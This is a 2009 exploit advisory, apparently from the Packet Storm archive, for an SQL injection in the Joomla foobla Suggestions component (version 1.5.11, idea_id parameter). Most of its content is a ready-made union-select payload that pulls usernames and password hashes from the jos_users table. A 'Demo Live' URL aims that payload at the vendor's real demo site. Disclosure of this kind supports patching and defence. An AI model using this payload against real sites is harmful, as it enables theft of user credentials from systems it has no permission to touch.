what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Foobla Suggestions SQL Injection

Joomla Foobla Suggestions SQL Injection
Posted Sep 16, 2009
Authored by Chip D3 Bi0s

The Joomla Foobla Suggestions component suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 5426e26a6e3a59bf7567083f90b7b2483f668e080e0140eb2465d81d66329569

Joomla Foobla Suggestions SQL Injection

Change Mirror Download
-----------------------------------------------------------------------------------------
joomla component com_foobla_suggestions (idea_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------

Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Date : 15 September 2009
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : foobla Suggestions
version : 1.5.11
Developer : foobla
License : GPL type : Commercial
Date Added : 15 September 2009
Demo : https://demo.foobla.com/foobla-suggestions-joomla/
Download : https://foobla.com/products/featured-joomla-extensions/foobla-suggestions-for-joomla.html
Description :

Have you ever used Uservoice? Would you like to have something
similar on Joomla but with unlimited features and no monthly fee?
The foobla Suggestions allows you to collect ideas, suggestions,
and votes from your cutomers.
---------------------------------------------------------------------------


I.SQL injection (idea_id)
Poc/Exploit:
~~~~~~~~

https://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]

[Sqlinjection]= null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users


Demo Live:
~~~~~~
https://demo.foobla.com/foobla-suggestions-joomla/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close